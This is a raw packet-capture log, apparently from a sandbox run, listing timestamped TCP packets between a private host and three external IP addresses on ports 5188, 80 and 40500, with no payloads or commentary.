Dec 5, 2024 17:32:13.149084091 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.149183035 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.151195049 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.151237011 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.151262999 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.151294947 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.153192997 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.153640985 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.153728962 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.155272007 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.155352116 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.155432940 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.157372952 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.157386065 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.157433033 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.159358025 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.159568071 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.159631968 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.161415100 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.161456108 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.161533117 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.163510084 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.163624048 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.163764954 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.165621042 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.165633917 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.165708065 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.167591095 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.167701960 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.167833090 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.169604063 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.169754982 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.169914007 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.171797037 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.171926975 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.171977997 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.173783064 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.173912048 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.173963070 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.175755978 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.175980091 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.176037073 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.177819967 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.178046942 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.178139925 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.179902077 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.179987907 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.180036068 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.181925058 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.182075024 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.182145119 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.183964014 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.190130949 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.190151930 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.190162897 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.190238953 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:13.190275908 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:13.190303087 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.190315008 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.190325975 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.190339088 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.190360069 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:13.190382004 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:13.190501928 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.190514088 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.190526009 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.190546036 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:13.190566063 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:13.236771107 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.248336077 CET	40500	49799	176.67.79.229	192.168.2.11
Dec 5, 2024 17:32:13.251821041 CET	49799	40500	192.168.2.11	176.67.79.229
Dec 5, 2024 17:32:13.253854990 CET	49799	40500	192.168.2.11	176.67.79.229
Dec 5, 2024 17:32:13.273639917 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.273884058 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.274002075 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.274687052 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.274776936 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.274843931 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.276758909 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.277004957 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.277055979 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.278779030 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.278938055 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.279763937 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.280797958 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.281075954 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.281222105 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.283001900 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.283118963 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.283225060 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.284838915 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.284972906 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.285567999 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.286823034 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.286976099 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.287031889 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.288732052 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.288887024 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.288954973 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.290570974 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.290642023 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.291764021 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.292351961 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.292489052 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.294112921 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.294167995 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.294250965 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.294996977 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.295834064 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.295983076 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.296020031 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.297487020 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.297610044 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.297665119 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.299525976 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.299679041 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.299724102 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.300893068 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.300910950 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.300991058 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.302572012 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.302623987 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.302800894 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.304083109 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.304130077 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.304212093 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.305679083 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.305721045 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.305890083 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.307215929 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.307327032 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.307751894 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.308783054 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.308862925 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.308923960 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.310086012 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.310148001 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.310153961 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:13.310204983 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:13.310383081 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.310542107 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.310594082 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.311866045 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.311944008 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.312009096 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.313534021 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.313611031 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.313674927 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.315156937 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.315267086 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.315332890 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.316644907 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.316831112 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.317605019 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.318130016 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.318289995 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.318346977 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.319859028 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.319870949 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.319931984 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.321223021 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.321306944 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.321357012 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.322792053 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.322946072 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.323782921 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.324678898 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.324714899 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.326253891 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.326273918 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.326309919 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.326327085 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.327430964 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.327516079 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.327788115 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.328995943 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.329051971 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.329746008 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.330539942 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.330576897 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.330616951 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.332129002 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.332732916 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.332792997 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.333726883 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.333810091 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.335258007 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.335318089 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.335359097 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.336112022 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.336815119 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.336827993 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.336870909 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.338418961 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.338505030 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.338768005 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.339958906 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.340048075 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.340169907 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.341459036 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.341607094 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.341697931 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.343044996 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.343197107 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.343806028 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.344598055 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.344671011 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.346164942 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.346224070 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.346226931 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.346271992 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.347672939 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.347839117 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.348212957 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.349267960 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.349510908 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.350011110 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.351607084 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.351752043 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.352338076 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.352425098 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.352473021 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.354249954 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.354322910 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.354347944 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.355532885 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.355588913 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.373725891 CET	40500	49799	176.67.79.229	192.168.2.11
Dec 5, 2024 17:32:13.373928070 CET	49799	40500	192.168.2.11	176.67.79.229
Dec 5, 2024 17:32:13.383311033 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.383409977 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:13.383469105 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.383507013 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:13.387540102 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.387600899 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:13.387610912 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.387649059 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:13.396032095 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.396048069 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.396105051 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:13.404392958 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.404469013 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:13.404797077 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.404844046 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:13.412842035 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.412897110 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.412966967 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:13.421276093 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.421411991 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.421483994 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:13.429785967 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.429824114 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.429850101 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:13.429869890 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:13.438100100 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.438153028 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:13.438175917 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.438246965 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:13.446835995 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.446913004 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.446969986 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:13.455008984 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.455070019 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:13.455116987 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.455157995 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:13.463371992 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.463427067 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:13.463484049 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.463526011 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:13.465785980 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.465881109 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.465995073 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.466039896 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.466068029 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.466120005 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.467408895 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.467737913 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.468123913 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.468796968 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.468843937 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.468904972 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.470192909 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.470206022 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.470350027 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.471189976 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.471255064 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.471416950 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.472492933 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.472620964 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.472875118 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.473762989 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.473948956 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.474004984 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.474934101 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.475184917 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.475229025 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.476286888 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.476408958 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.476458073 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.477416992 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.477654934 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.477777004 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.478677034 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.478915930 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.478955984 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.480031013 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.480082035 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.480158091 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.481132984 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.481144905 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.481235981 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.482235909 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.482248068 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.482299089 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.483361959 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.483562946 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.483865023 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.484769106 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.484893084 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.484957933 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.485693932 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.485810995 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.485892057 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.486978054 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.487112999 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.487159014 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.488100052 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.488245010 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.488301992 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.489340067 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.489367962 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.489435911 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.490520954 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.490885973 CET	5188	49792	92.255.85.66	192.168.2.11
